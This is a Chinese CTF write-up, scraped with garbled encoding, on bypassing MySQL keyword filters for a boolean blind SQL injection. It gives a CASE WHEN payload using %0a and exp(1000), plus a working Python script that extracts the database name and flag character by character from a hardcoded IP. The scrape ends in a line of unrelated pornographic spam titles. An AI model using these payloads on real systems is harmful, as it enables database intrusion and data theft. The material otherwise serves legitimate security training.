<kbd id="afajh"><form id="afajh"></form></kbd>
<strong id="afajh"><dl id="afajh"></dl></strong>
    <del id="afajh"><form id="afajh"></form></del>
        1. <th id="afajh"><progress id="afajh"></progress></th>
          <b id="afajh"><abbr id="afajh"></abbr></b>
          <th id="afajh"><progress id="afajh"></progress></th>

          記一次MySQL注入繞過

          共 1675字,需瀏覽 4分鐘

           ·

          2021-10-11 15:56

          作者:末初??編輯:白帽子社區(qū)運營團隊




          ? ??"白帽子社區(qū)在線CTF靶場BMZCTF,歡迎各位在這里練習、學習,BMZCTF全身心為網絡安全賽手提供優(yōu)質學習環(huán)境,鏈接(http://www.bmzclub.cn/)

          "? ??





          SQL注入類型判斷
          某朋友比賽中讓幫忙看的一道題目,如下

          查看源碼發(fā)現提示?

          存在過濾且,limit參數只能為單個數字?fuzz一下sql注入關鍵字看看都過濾了哪些字符?

          直接在class參數插入exp(100)回顯正常,插入exp(1000)發(fā)現返回database error;說明此處sql注入可直接插入執(zhí)行,其次如果sql語句執(zhí)行錯誤會返回報錯提示;

          繞過

          那么就可以做布爾盲注了,但是比較棘手的是過濾了逗號,;不能使用if進行條件判斷;繞過逗號的方法from x for y不能在if中使用。if無法使用可以用case when [express] then [x] else [y] end代替空格繞過可以使用括號()或者%0a=、like、regexp被過濾可以用in(不過in對字符大小寫不敏感)

          class=case%0awhen%0a(2)in(1)%0athen%0aexp(1000)else%0a1%0aend&limit=4

          利用腳本編寫
          from urllib.parse import urlencodefrom urllib.parse import unquoteimport requests
          burp0_url = "http://123.60.32.152:80/"burp0_headers = {"Content-Type": "application/x-www-form-urlencoded"}all_str = "0123456789abcdefghijklmnopqrstuvwxyz!\"#$%&\\'()*+,-./:;<=>?@[\\]^_`{|}~"
          flag = ''for leng in range(1,50): for char in all_str: payload = "case%0awhen%0amid(database()from({})for(1))%0ain%0a(0x{})%0athen%0aexp(1000)%0aelse%0a1%0aend".format(leng, hex(ord(char))[2:]) #payload = "case%0awhen%0amid((select%0aflag%0afrom%0aflag)from({})for(1))%0ain%0a(0x{})%0athen%0aexp(1000)%0aelse%0a1%0aend".format(leng, hex(ord(char))[2:]) burp0_data = {"class": unquote(payload), "limit": "4"} resp = requests.post(burp0_url, headers=burp0_headers, data=urlencode(burp0_data)) if 'error' in resp.text: flag += char print(flag) else: continue # print(resp.text) # print(resp.request.body)

          到數據名稱:babysql 直接按照前面的提示查flag


          往期精彩文章




          pwnhub 9月公開賽
          黃金票據的制作與使用
          baijiacmsV4代碼審計!
          記一道有趣的“簽到”題




          技術支持:白帽子社區(qū)團隊
          —?掃碼關注我們?




          瀏覽 44
          點贊
          評論
          收藏
          分享

          手機掃一掃分享

          分享
          舉報
          評論
          圖片
          表情
          推薦
          點贊
          評論
          收藏
          分享

          手機掃一掃分享

          分享
          舉報
          <kbd id="afajh"><form id="afajh"></form></kbd>
          <strong id="afajh"><dl id="afajh"></dl></strong>
            <del id="afajh"><form id="afajh"></form></del>
                1. <th id="afajh"><progress id="afajh"></progress></th>
                  <b id="afajh"><abbr id="afajh"></abbr></b>
                  <th id="afajh"><progress id="afajh"></progress></th>
                  国产精品国产三级国产三级人 | 91乱子伦国产乱子伦无码 | 成人免费黄色网址 | 夜色av无码 | 国产精品v欧美精品v日韩 |